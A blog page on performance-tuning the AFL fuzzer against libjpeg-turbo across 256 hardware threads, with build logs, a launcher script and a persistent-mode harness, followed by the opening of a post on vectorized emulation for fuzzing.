Proper instrumentation is a fundamental step in performing a comprehensive security test. Combining source code review with dynamic testing and client instrumentation, it is possible to analyze every aspect of the target application. These simple techniques allow us to reach edge cases, exercise all code paths and eventually find vulnerabilities.

@voidsec @lucacarettoni

Read more

Scaling AFL to a 256 thread machine

16 September 2018 at 22:51

That's a lot of cores

Changelog

Date Info
2018-09-16 Initial
2018-09-16 Changed custom JPEG test program a little, saves 2 syscalls bringing us from 9 per fuzz case to 7 fuzz case. Used -O2 flag to build. Neither of these had a noticeable impact on performance thus performance numbers were not updated.

Performance disclaimer

Performance is critical to my work and I’ve been researching specifically fuzzer performance and scaling for the past 5 years. It’s important that the performance numbers here are accurate and use tooling to their fullest. Please let me know about any suggestions that I could do to make these numbers better while still using unmodified AFL. I also was using a stock libjpeg as I do not want to make internal mods to JPEG as that increases risk of invalid results.

The machine this testing was done on is a single socket Intel Xeon Phi 7210 a 64-core 256-thread machine (yes, 4 HW threads per core). This is clocked at 1.3 GHz and the cores are effectively Atom cores, making the much weaker than conventional ones. A single 1.3 GHz Phi core here usually runs identical code about 10-20x slower than a conventional modern Xeon at 2.8 GHz. This means that numbers here might seem unreasonably low compared to what you may expect, but it’s because these are weak cores.

Intro

I’ve been trying to get AFL to scale correctly for the past day, which turns out to be fairly hard. AFL doesn’t really provide any built in way of just spinning up multiple cores by using something like afl-fuzz -j64 ..., so we have to do it ourselves. Further the machine I’m trying this on is quite exotic and not much scales correctly to it anyways. But, let’s hop right on in and give it a go! This testing is actually being done for an upcoming blog series demonstrating a neat new way of fuzzing and harnessing that I call “Vectorized Emulation”. I wanted to get the best performance numbers out of AFL so I had a reasonable comparison that would make some of the tech a bit more relatable. Stay tuned for that post hopefully within a week!

In this blog I’m going to talk about the major things to keep an eye on when you’re trying to get every drop of performance:

  • Are you using all your cores?
  • Are you scaling well?
  • Are you spending time in your actual target or other things like the kernel?

If you’re just spinning up one process per core, it’s very possible that all of these are not true. We’ll go through a real example of this process and how easy it is to fall into a trap of not effectively using your cores.

Target selection

First of all, we need a good target that we can try to fuzz as fast as possible. Something that is common, reasonably small, and easy to convert to use AFL persistent mode. I’ve decided to look at libjpeg-turbo as it’s a common target, many people are probably already familiar, and it’s quite simple to just throw in a loop. Further if we found a bug it’d be a pretty good day, so it’s always fun to play with real targets.

Fuzzing out of the can

The first thing I’m going to try on almost any new target I look at will be to find a tool that already comes with the source that in some way parses the image. In this case for libjpeg-turbo we can actually use the tool that comes with called djpeg. This is a simple command line utility that takes in a file over stdin or via a command line argument, and produces another output file potentially of another format. Since we know we are going to use AFL, let’s get a basic AFL environment set up. It’s pretty simple, and in our case we’re using afl-2.52b the latest at the time of writing this blog. We’re not using ASAN as we’re looking for best case performance numbers.

pleb@debphi:~/blogging$ wget http://lcamtuf.coredump.cx/afl/releases/afl-latest.tgz
--2018-09-16 16:09:11--  http://lcamtuf.coredump.cx/afl/releases/afl-latest.tgz
Resolving lcamtuf.coredump.cx (lcamtuf.coredump.cx)... 199.58.85.40
Connecting to lcamtuf.coredump.cx (lcamtuf.coredump.cx)|199.58.85.40|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 835907 (816K) [application/x-gzip]
Saving to: ‘afl-latest.tgz’

afl-latest.tgz                                              100%[========================================================================================================================================>] 816.32K   323KB/s    in 2.5s

2018-09-16 16:09:14 (323 KB/s) - ‘afl-latest.tgz’ saved [835907/835907]

pleb@debphi:~/blogging$ tar xf afl-latest.tgz
pleb@debphi:~/blogging$ cd afl-2.52b/
pleb@debphi:~/blogging/afl-2.52b$ make -j256
[*] Checking for the ability to compile x86 code...
[+] Everything seems to be working, ready to compile.
cc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" afl-gcc.c -o afl-gcc -ldl
set -e; for i in afl-g++ afl-clang afl-clang++; do ln -sf afl-gcc $i; done
cc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" afl-fuzz.c -o afl-fuzz -ldl
cc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" afl-showmap.c -o afl-showmap -ldl
cc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" afl-tmin.c -o afl-tmin -ldl
cc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" afl-gotcpu.c -o afl-gotcpu -ldl
cc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" afl-analyze.c -o afl-analyze -ldl
cc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" afl-as.c -o afl-as -ldl
ln -sf afl-as as
[*] Testing the CC wrapper and instrumentation output...
unset AFL_USE_ASAN AFL_USE_MSAN; AFL_QUIET=1 AFL_INST_RATIO=100 AFL_PATH=. ./afl-gcc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" test-instr.c -o test-instr -ldl
echo 0 | ./afl-showmap -m none -q -o .test-instr0 ./test-instr
echo 1 | ./afl-showmap -m none -q -o .test-instr1 ./test-instr
[+] All right, the instrumentation seems to be working!
[+] LLVM users: see llvm_mode/README.llvm for a faster alternative to afl-gcc.
[+] All done! Be sure to review README - it's pretty short and useful.

Out of the box AFL gives us some compiler wrappers for gcc and clang, afl-gcc and afl-clang respectively. We’ll use these to build the libjpeg-turbo source so AFL adds instrumentation that is used for coverage and feedback. Which is critical to modern fuzzer operation, especially when just doing byte flipping like AFL does.

Let’s grab libjpeg-turbo and build it:

pleb@debphi:~/blogging$ git clone https://github.com/libjpeg-turbo/libjpeg-turbo
Cloning into 'libjpeg-turbo'...
remote: Counting objects: 13559, done.
remote: Compressing objects: 100% (40/40), done.
remote: Total 13559 (delta 14), reused 8 (delta 1), pack-reused 13518
Receiving objects: 100% (13559/13559), 11.67 MiB | 8.72 MiB/s, done.
Resolving deltas: 100% (10090/10090), done.
pleb@debphi:~/blogging$ mkdir buildjpeg
pleb@debphi:~/blogging$ cd buildjpeg/
pleb@debphi:~/blogging/buildjpeg$ export PATH=$PATH:/home/pleb/blogging/afl-2.52b
pleb@debphi:~/blogging/buildjpeg$ cmake -G"Unix Makefiles" -DCMAKE_C_COMPILER=afl-gcc -DCMAKE_C_FLAGS=-m32 /home/pleb/blogging/libjpeg-turbo/
...
pleb@debphi:~/blogging/buildjpeg$ make -j256
...
[100%] Built target tjunittest-static
pleb@debphi:~/blogging/buildjpeg$ ls
cjpeg           CMakeFiles             CTestTestfile.cmake  jconfig.h     jpegtran         libjpeg.map    libjpeg.so.62.3.0  libturbojpeg.so.0      md5         sharedlib  tjbench-static  tjexampletest      wrjpgcom
cjpeg-static    cmake_install.cmake    djpeg                jconfigint.h  jpegtran-static  libjpeg.so     libturbojpeg.a     libturbojpeg.so.0.2.0  pkgscripts  simd       tjbenchtest     tjunittest
CMakeCache.txt  cmake_uninstall.cmake  djpeg-static         jcstest       libjpeg.a        libjpeg.so.62  libturbojpeg.so    Makefile               rdjpgcom    tjbench    tjexample       tjunittest-static

Woo! We have a libjpeg-turbo built with AFL and instrumented! We now have a ./djpeg which is what we’re going to use to fuzz. We need a test input corpus of JPEGs, however since we’re benchmarking I just picked a single JPEG that is 3.2 KiB in size. We’ll set up AFL and fuzz this with no frills:

pleb@debphi:~/blogging$ mkdir fuzzing
pleb@debphi:~/blogging$ cd fuzzing/
pleb@debphi:~/blogging/fuzzing$ mkdir inputs
... Copy in an input
pleb@debphi:~/blogging/fuzzing$ mkdir outputs
pleb@debphi:~/blogging/fuzzing$ afl-fuzz -h
pleb@debphi:~/blogging/fuzzing$ afl-fuzz -i inputs/ -o outputs/ -- ../buildjpeg/djpeg @@

Now we’re hacking!

Oh wow we're a hacker

It’s important that you keep an eye on exec speed as it can flutter around during different passes, in this case 210-220 is where it seemed to hover around on average. So I’ll be using the 214.4 number from the picture as the baseline for this first test.

Using all your cores

I’ve got some sad news though. This isn’t using anything but a single core. We have a 256 thread machine and we’re using 1/256th of it to fuzz, what a waste of silicon. Sadly there’s no trivial way to spin up AFL so lets just cheat and grab something that does it for us: afl-launch . This requires go but the instructions are pretty clear on how to get it set up and running. It takes effectively the exact same args as afl-fuzz but it takes an -n parameter that spins up multiple jobs for us. Let’s also switch to a ramdisk to decrease thrashing of the disk (doesn’t matter that much anyways due to FS caching):

pleb@debphi:~/blogging/fuzzing$ rm -rf /mnt/ram/outputs/*
pleb@debphi:~/blogging/fuzzing$ ~/go/bin/afl-launch -n 256 -i /mnt/ram/inputs/ -o /mnt/ram/outputs/ -- ../buildjpeg/djpeg @@

And we expect roughly 214 * 64 (number of exec/sec on single core * number of physical cores) = 14k execs/sec. In reality I expect even more than this due to hyperthreading.

pleb@debphi:~/blogging/fuzzing$ ps a | grep afl-fuzz | grep -v grep | wc -l
256
pleb@debphi:~/blogging/fuzzing$ afl-whatsup -s /mnt/ram/outputs/
status check tool for afl-fuzz by <[email protected]>

Summary stats
=============

       Fuzzers alive : 256
      Total run time : 0 days, 10 hours
         Total execs : 0 million
    Cumulative speed : 4108 execs/sec
       Pending paths : 455 faves, 14932 total
  Pending per fuzzer : 1 faves, 58 total (on average)
       Crashes found : 0 locally unique

Hmm? What? I’m running 256 instances, afl-whatsup confirms that, but I’m only getting 4.1k execs/sec? That’s a 20x speedup running 256 threads!? Hmm, this is no good. We even switched to a ramdisk so we even have an advantage over the single threaded run. Let’s check out that CPU utilization:

Wait what

Actually using all your cores

Okay, so apparently we’re only using 22 threads even though we have 256 processes running. Linux will evenly distribute threads so AFL must be doing something special here. If we just look around for affinity in the AFL codebase we stumble across this:

/* Build a list of processes bound to specific cores. Returns -1 if nothing
   can be found. Assumes an upper bound of 4k CPUs. */

static void bind_to_free_cpu(void) {

  DIR* d;
  struct dirent* de;
  cpu_set_t c;

  u8 cpu_used[4096] = { 0 };
  u32 i;

  if (cpu_core_count < 2) return;

  if (getenv("AFL_NO_AFFINITY")) {

    WARNF("Not binding to a CPU core (AFL_NO_AFFINITY set).");
    return;

  }

  d = opendir("/proc");

  if (!d) {

    WARNF("Unable to access /proc - can't scan for free CPU cores.");
    return;

  }

  ACTF("Checking CPU core loadout...");

  /* Introduce some jitter, in case multiple AFL tasks are doing the same
     thing at the same time... */

  usleep(R(1000) * 250);

  /* Scan all /proc/<pid>/status entries, checking for Cpus_allowed_list.
     Flag all processes bound to a specific CPU using cpu_used[]. This will
     fail for some exotic binding setups, but is likely good enough in almost
     all real-world use cases. */

  while ((de = readdir(d))) {

    u8* fn;
    FILE* f;
    u8 tmp[MAX_LINE];
    u8 has_vmsize = 0;

    if (!isdigit(de->d_name[0])) continue;

    fn = alloc_printf("/proc/%s/status", de->d_name);

    if (!(f = fopen(fn, "r"))) {
      ck_free(fn);
      continue;
    }

    while (fgets(tmp, MAX_LINE, f)) {

      u32 hval;

      /* Processes without VmSize are probably kernel tasks. */

      if (!strncmp(tmp, "VmSize:\t", 8)) has_vmsize = 1;

      if (!strncmp(tmp, "Cpus_allowed_list:\t", 19) &&
          !strchr(tmp, '-') && !strchr(tmp, ',') &&
          sscanf(tmp + 19, "%u", &hval) == 1 && hval < sizeof(cpu_used) &&
          has_vmsize) {

        cpu_used[hval] = 1;
        break;

      }

    }

    ck_free(fn);
    fclose(f);

  }

  closedir(d);

  for (i = 0; i < cpu_core_count; i++) if (!cpu_used[i]) break;

  if (i == cpu_core_count) {

    SAYF("\n" cLRD "[-] " cRST
         "Uh-oh, looks like all %u CPU cores on your system are allocated to\n"
         "    other instances of afl-fuzz (or similar CPU-locked tasks). Starting\n"
         "    another fuzzer on this machine is probably a bad plan, but if you are\n"
         "    absolutely sure, you can set AFL_NO_AFFINITY and try again.\n",
         cpu_core_count);

    FATAL("No more free CPU cores");

  }

  OKF("Found a free CPU core, binding to #%u.", i);

  cpu_aff = i;

  CPU_ZERO(&c);
  CPU_SET(i, &c);

  if (sched_setaffinity(0, sizeof(c), &c))
    PFATAL("sched_setaffinity failed");

}

#endif /* HAVE_AFFINITY */

We can see that this code does some interesting processing on procfs to find which processors are not in use, and then pins to them. Interestingly we never get the “Uh-oh” message saying we’re out of CPUs, and all 256 of our instances are running. The only way this is possible is if AFL is binding multiple processes to the same core. This is possible due to races on the procfs and the CPU masks not getting updated right away, so some delay has to be added between spinning up AFL instances. But we can do better.

We see at the top of this function this functionality can be turned off entirely by setting the AFL_NO_AFFINITY environment variable. Lets do that and then manage the affinities ourselves. We’re also going to drop the afl-launch tool and just do it ourselves.

import subprocess, threading, time, shutil, os

NUM_CPUS = 256

INPUT_DIR  = "/mnt/ram/jpegs"
OUTPUT_DIR = "/mnt/ram/outputs"

def do_work(cpu):
    master_arg = "-M"
    if cpu != 0:
        master_arg = "-S"

    # Restart if it dies, which happens on startup a bit
    while True:
        try:
            sp = subprocess.Popen([
                "taskset", "-c", "%d" % cpu,
                "afl-fuzz", "-i", INPUT_DIR, "-o", OUTPUT_DIR,
                master_arg, "fuzzer%d" % cpu, "--",
                "../buildjpeg/djpeg", "@@"],
                stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            sp.wait()
        except:
            pass

        print("CPU %d afl-fuzz instance died" % cpu)

        # Some backoff if we fail to run
        time.sleep(1.0)

assert os.path.exists(INPUT_DIR), "Invalid input directory"

if os.path.exists(OUTPUT_DIR):
    print("Deleting old output directory")
    shutil.rmtree(OUTPUT_DIR)

print("Creating output directory")
os.mkdir(OUTPUT_DIR)

# Disable AFL affinity as we do it better
os.environ["AFL_NO_AFFINITY"] = "1"

for cpu in range(0, NUM_CPUS):
    threading.Timer(0.0, do_work, args=[cpu]).start()

    # Let master stabilize first
    if cpu == 0:
        time.sleep(1.0)

while threading.active_count() > 1:
    time.sleep(5.0)

    try:
        subprocess.check_call(["afl-whatsup", "-s", OUTPUT_DIR])
    except:
        pass

By using taskset when we spawn AFL processes we manually control the core rather than AFL trying to figure out what is not being used as we know what’s not used since we’re launching everything. Further we os.environ["AFL_NO_AFFINITY"] = "1" to make sure AFL doesn’t get control over affinity as we now manage it. We’ve got some other things in here like where we give 1 second of delay after the master instance, we automatically clean up the ouput directory, and call afl-whatsup in a loop. We also restart dead afl-fuzz instances which I’ve observed can happen sometimes when spawning everything at once.

status check tool for afl-fuzz by <[email protected]>

Summary stats
=============

       Fuzzers alive : 256
      Total run time : 1 days, 0 hours
         Total execs : 6 million
    Cumulative speed : 18363 execs/sec
       Pending paths : 1 faves, 112903 total
  Pending per fuzzer : 0 faves, 441 total (on average)
       Crashes found : 0 locally unique

But it worked

Well that gave us a 4.5x speedup! Look at that CPU utilization!

Optimizing our target for maxium CPU time

We’re now using 100% of all cores. If you’re no htop master you might not know that the red means kernel time on the bars. This means that (eyeballing it) we’re spending about 50% of the CPU time in the kernel. Any time in the kernel is time not spent fuzzing JPEGs. At this point we’ve got AFL doing everything it can, but we’re gonna have to get more creative with our target.

So this is telling us we must be able to find at least a 2x speedup on this target, moving our goal to 40k execs/sec. It’s possible kernel usage is unavoidable, but for something like libjpeg-turbo it would be unreasonable to spend any large amount of time in the kernel anyways. Let’s use everything AFL gives us by using afl persistent mode. This effectively allows you to run multiple fuzz cases in a single instance of the program rather than reverting program state back every fuzz case via clone() or fork(). This can reduce that kernel overhead we’re worried about.

Let’s set up the persistent mode environment by building afl-clang-fast.

pleb@debphi:~/blogging$ cd afl-2.52b/llvm_mode/
pleb@debphi:~/blogging/afl-2.52b/llvm_mode$ make -j8
[*] Checking for working 'llvm-config'...
[*] Checking for working 'clang'...
[*] Checking for '../afl-showmap'...
[+] All set and ready to build.
clang -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DBIN_PATH=\"/usr/local/bin\" -DVERSION=\"2.52b\"  afl-clang-fast.c -o ../afl-clang-fast
ln -sf afl-clang-fast ../afl-clang-fast++
clang++ `llvm-config --cxxflags` -fno-rtti -fpic -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DVERSION=\"2.52b\" -Wno-variadic-macros -shared afl-llvm-pass.so.cc -o ../afl-llvm-pass.so `llvm-config --ldflags`
warning: unknown warning option '-Wno-maybe-uninitialized'; did you mean '-Wno-uninitialized'? [-Wunknown-warning-option]
1 warning generated.
clang -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DBIN_PATH=\"/usr/local/bin\" -DVERSION=\"2.52b\"  -fPIC -c afl-llvm-rt.o.c -o ../afl-llvm-rt.o
[*] Building 32-bit variant of the runtime (-m32)... success!
[*] Building 64-bit variant of the runtime (-m64)... success!
[*] Testing the CC wrapper and instrumentation output...
unset AFL_USE_ASAN AFL_USE_MSAN AFL_INST_RATIO; AFL_QUIET=1 AFL_PATH=. AFL_CC=clang ../afl-clang-fast -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DBIN_PATH=\"/usr/local/bin\" -DVERSION=\"2.52b\"  ../test-instr.c -o test-instr
echo 0 | ../afl-showmap -m none -q -o .test-instr0 ./test-instr
echo 1 | ../afl-showmap -m none -q -o .test-instr1 ./test-instr
[+] All right, the instrumentation seems to be working!
[+] All done! You can now use '../afl-clang-fast' to compile programs.

Now we have an afl-clang-fast binary in the afl-2.52b folder. Let’s rebuild libjpeg-turbo using this

pleb@debphi:~/blogging/buildjpeg$ cmake -G"Unix Makefiles" -DCMAKE_C_COMPILER=afl-clang-fast -DCMAKE_C_FLAGS=-m32 /home/pleb/blogging/libjpeg-turbo/
pleb@debphi:~/blogging/buildjpeg$ make -j256
...
[100%] Built target jpegtran-static
afl-clang-fast 2.52b by <[email protected]>
[100%] Built target jpegtran

So, libjpeg-turbo is a library. Meaning it’s designed to be used from other programs. It’s also one of the most popular libraries for image compression, so surely it’s relatively easy to use. Let’s quickly write up a bare-bones application that loads an image from a provided argument:

#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include "jpeglib.h"
#include <setjmp.h>

struct my_error_mgr {
  struct jpeg_error_mgr pub;    /* "public" fields */
  jmp_buf setjmp_buffer;        /* for return to caller */
};

typedef struct my_error_mgr * my_error_ptr;

// Longjmp out on errors
METHODDEF(void)
my_error_exit(j_common_ptr cinfo)
{
  my_error_ptr myerr = (my_error_ptr) cinfo->err;
  longjmp(myerr->setjmp_buffer, 1);
}


// Eat warnings
METHODDEF(void)
emit_message(j_common_ptr cinfo, int msg_level) {}

GLOBAL(int)
read_JPEG_file (char * filename, unsigned char *filebuf, size_t filebuflen)
{
  struct jpeg_decompress_struct cinfo;
  struct my_error_mgr jerr;
  JSAMPARRAY buffer;            /* Output row buffer */
  int row_stride;               /* physical row width in output buffer */
  int fd;
  ssize_t flen;

  fd = open(filename, O_RDONLY);
  if(fd == -1){
    return 0;
  }

  flen = read(fd, (void*)filebuf, filebuflen);
  close(fd);

  if(flen <= 0){
    return 0;
  }

  cinfo.err = jpeg_std_error(&jerr.pub);
  jerr.pub.error_exit = my_error_exit;
  jerr.pub.emit_message = emit_message;

  /* Establish the setjmp return context for my_error_exit to use. */
  if (setjmp(jerr.setjmp_buffer)) {
    jpeg_destroy_decompress(&cinfo);
    return 0;
  }

  jpeg_create_decompress(&cinfo);
  jpeg_mem_src(&cinfo, filebuf, flen);
  (void) jpeg_read_header(&cinfo, TRUE);
  (void) jpeg_start_decompress(&cinfo);
  row_stride = cinfo.output_width * cinfo.output_components;
  buffer = (*cinfo.mem->alloc_sarray)
                ((j_common_ptr) &cinfo, JPOOL_IMAGE, row_stride, 1);

  while (cinfo.output_scanline < cinfo.output_height) {
    (void) jpeg_read_scanlines(&cinfo, buffer, 1);
  }

  (void) jpeg_finish_decompress(&cinfo);
  jpeg_destroy_decompress(&cinfo);
  return 1;
}

int main(int argc, char *argv[]) {
  void *filebuf = NULL;
  const size_t filebuflen = 32 * 1024;

  if(argc != 2) { fprintf(stderr, "Nice usage noob\n"); return -1; }

  filebuf = malloc(filebuflen);
  if(!filebuf) {
    return -1;
  }

  while(__AFL_LOOP(100000)) {
    read_JPEG_file(argv[1], filebuf, filebuflen);
  }
}

This can be built with:

AFL_PATH=/home/pleb/blogging/afl-2.52b afl-clang-fast -O2 -m32 example.c -I/home/pleb/blogging/buildjpeg -I/home/pleb/blogging/libjpeg-turbo /home/pleb/blogging/buildjpeg/libjpeg.a

You can see the code this was derived from with more comments here which I modified to my specific needs and removed almost all comments to keep code as small as possible. It’s also relatively simple to read based off function names.

We made a few changes to the code. We removed all output from the code. It should not print to the screen for warnings or errors, it should not save any files, it should only parse the input. It then will correctly return up via setjmp()/longjmp() on errors and allow us to quickly move to the next case.

You can see we introduced __AFL_LOOP here. This is a special meaning to running this code but only under afl-fuzz. When running it uses signals to notify that it is done with a fuzz case and needs a new one. This loop we set at a limit of 100,000 iterations before tearing down the child and restarting. It’s pretty simple and pretty clean. So now hopefully our syscall usage is down. Let’s check that first.

We’re going to run this new single threaded and verify it’s running as persistent:

pleb@debphi:~/blogging/jpeg_fuzz$ afl-fuzz -i /mnt/ram/jpegs/ -o /mnt/ram/outputs/ -- ./a.out @@
...
[+] Persistent mode binary detected. <<< WOO!

Yay

Woo, it’s just a little under 2x faster than the initial single threaded djpeg (we’re running this one ramdisk, but I verified that was not relevant here). It’s just running faster because we’re doing less misc things in the kernel and the code itself.

So AFL tells us that it is persistent, but let’s triple check by running strace on the fuzz process:

ps aux | grep "R.*a.out" | grep -v grep | awk '{print "-p " $2}' | xargs strace

It’s a bit ugly but we strace any actively running a.out task, since it’s crude it might take a few tries to get attached to the right one but I’m no bash pro.

We can see we get a repeating pattern:

openat(AT_FDCWD, "/mnt/ram/outputs//.cur_input", O_RDONLY) = 3
read(3, "\377\330\377\340\0\20JFIF\0\1\1\0\0\1\0\1\0\0\377\333\0C\0\5\3\4\4\4\3\5"..., 32768) = 3251
close(3)                                = 0
rt_sigprocmask(SIG_BLOCK, ~[RTMIN RT_1], [], 8) = 0
getpid()                                = 53786
gettid()                                = 53786
tgkill(53786, 53786, SIGSTOP)           = 0
--- SIGSTOP {si_signo=SIGSTOP, si_code=SI_TKILL, si_pid=53786, si_uid=1000} ---
--- stopped by SIGSTOP ---
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
--- SIGCONT {si_signo=SIGCONT, si_code=SI_USER, si_pid=53776, si_uid=1000} ---
openat(AT_FDCWD, "/mnt/ram/outputs//.cur_input", O_RDONLY) = 3
read(3, "\377\330\377\340\0\20JFIF\0\1\1\0\0\1\0\1\0\0\377\333\0C\0\5\3\4\4\4\3\5"..., 32768) = 3251
close(3)                                = 0
rt_sigprocmask(SIG_BLOCK, ~[RTMIN RT_1], [], 8) = 0
getpid()                                = 53786
gettid()                                = 53786
tgkill(53786, 53786, SIGSTOP)           = 0
--- SIGSTOP {si_signo=SIGSTOP, si_code=SI_TKILL, si_pid=53786, si_uid=1000} ---
--- stopped by SIGSTOP ---
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
--- SIGCONT {si_signo=SIGCONT, si_code=SI_USER, si_pid=53776, si_uid=1000} ---

We see the openat to open, read to read the file, and close when it’s done parsing. So what is the rt_sigprocmask() and beyond? Well in persistent mode AFL uses this to communicate when fuzz cases are done. You can actually find this code in afl-2.52b/llvm_mode/afl-llvm-rt.o.c. There’s a descriptive comment:

    /* In persistent mode, the child stops itself with SIGSTOP to indicate
       a successful run. In this case, we want to wake it up without forking
       again. */

This means that the rt_sigprocmask() and beyond is out of our control. But other than that we’re doing the bare minimum to read a file by doing open, read, and close. Nothing else. We’re running tens of thousands of fuzz cases in a single instance of this program without having to exit() out and fork()!

Alright! Let’s put it all together and fuzz with this new binary on all cores!

status check tool for afl-fuzz by <[email protected]>

Summary stats
=============

       Fuzzers alive : 256
      Total run time : 1 days, 1 hours
         Total execs : 20 million
    Cumulative speed : 56003 execs/sec
       Pending paths : 1 faves, 122669 total
  Pending per fuzzer : 0 faves, 479 total (on average)
       Crashes found : 0 locally unique

Woo 56k per second! More than the 2x we were expecting from the custom written target. And I’ll save you another htop image and just tell you that now only about 8% of CPU time is spent in the kernel. Given we’re doing 7 syscalls per fuzz case, that means we’re doing about 400k per second, which still is fairly high but most of the syscalls are due to AFL and not us so they’re out of our control.

Conclusion

It’s pretty easy to get stuck thinking tools work out of the box. People usually worry about scaling at the level of “if it’s possible” rather than “is it actually doing more work”. It’s important to note that it’s very easy to run 64 instances of a tool and end up getting very little performance gain. In the world of fuzzing you usually should be able to scale linearly with cores, so if you’re only getting 1/2 efficiency it’s probably time to settle in and figure out if it’s in your control or not.

We were able to go from naive single-core AFL usage with 214 execs/sec, to “just run 256 AFLs” at 4k/sec, to doing some optimizations to get us to 56k/sec. All within a few hours of work. It’d be a shame if we would have just taken the 4k/sec and run with it, as we would be wasting almost all of our CPU.

Extra

This is my first blog, so please let me know anything you want more or less of. Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up, or I think you can use RSS or something if you’re still one of those people.

Shoutouts

Shoutouts to @ScottyBauer1 and @marcograss on Twitter for giving me AFL tips and tricks for getting these numbers up

Vectorized Emulation: Hardware accelerated taint tracking at 2 trillion instructions per second

14 October 2018 at 21:37

This is the introduction of a multipart series. It is to give a high level overview without really deeply diving into any individual component.

Read the next post in the series: MMU Design

Vectorized emulation, why do I do this to myself?

Why

Changelog

Date Info
2018-10-14 Initial

Tweeter

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up, or I think you can use RSS or something if you’re still one of those people.

Performance disclaimer

All benchmarks done here are on a single Xeon Phi 7210 with 96 GiB of RAM. This comes out to about $4k USD, but if you cheap out on RAM and buy used Phis you could probably get the same setup for $1k USD.

This machine has 64 cores and 256 hardware threads. Using AVX-512 I run 4096 32-bit VMs at a time ((512 / 32) * 256).

All performance numbers in this article refer to the machine running at 100% on all cores.

Terminology

Term Inology
Lane A single component in a larger vector (often 32-bit throughout this document)
VM A single VM, in terms of vectorized emulation it refers to a single lane of a vector

Intro

In this blog I’m going to introduce you to a concept I’ve been working on for almost 2 years now. Vectorized emulation. The goal is to take standard applications and JIT them to their AVX-512 equivalent such that we can fuzz 16 VMs at a time per thread. The net result of this work allows for high performance fuzzing (approx 40 billion to 120 billion instructions per second [the 2 trillion clickbait number is theoretical maximum]) depending on the target, while gathering differential coverage on code, register, and memory state.

By gathering more than just code coverage we are able to track state of code deeper than just code coverage itself, allowing us to fuzz through things like memcmp() without any hooks or static analysis of the target at all.

Further since we’re running emulated code we are able to run a soft MMU implementation which has byte-level permissions. This gives us stronger-than-ASAN memory protections, making bugs fail faster and cleaner.

How it came to be an idea

My history with fuzzing tools starts off effectively with my hypervisor for fuzzing, falkervisor. falkervisor served me well for quite a long time, but my work rotated more towards non-x86 targets, which it did not support. With a demand for emulation I made modifications to QEMU for high-performance fuzzing, and ultimately swapped out their MMU implementation for my own which has byte-level permissions. This new byte-level permission model allowed me to catch even the smallest memory corruptions, leading to finding pretty fun bugs!

More and more after working with QEMU I got annoyed. It’s designed for whole systems yet I was using it for fuzzing targets that were running with unknown hardware and running from dynamically dumped memory snapshots. Due to the level of abstraction in QEMU I started to get concerned with the potential unknowns that would affect the instrumentation and fuzzing of targets.

I developed my first MIPS emulator. It was not designed for performance, but rather purely for simple usage and perfect single stepping. You step an instruction, registers and memory get updated. No JIT, no intermediate registers, no flushing or weird block level translation changes. I eventually made a JIT for this that maintained the flush-state-every-instruction model and successfully used it against multiple targets. I also developed an ARM emulator somewhere in this timeframe.

When early 2017 rolls around I’m bored and want to buy a Xeon Phi. Who doesn’t want a 64-core 256-thread single processor? I really had no need for the machine so I just made up some excuse in my head that the high bandwidth memory on die would make reverting snapshots faster. Yeah… like that really matters? Oh well, I bought it.

While the machine was on the way I had this idea… when fuzzing from a snapshot all VMs initially start off fuzzing with the exact same state, except for maybe an input buffer and length being changed. Thus they do identical operations until user-controlled data is processed. I’ve done some fun vectorization work before, but what got me thinking is why not just emit vpaddd instead of add when JITting, and now I can run 16 VMs at a time!

Alas… the idea was born

A primer on snapshot fuzzing

Snapshot fuzzing is fundamental to this work and almost all fuzzing work I have done from 2014 and beyond. It warrants its own blog entirely.

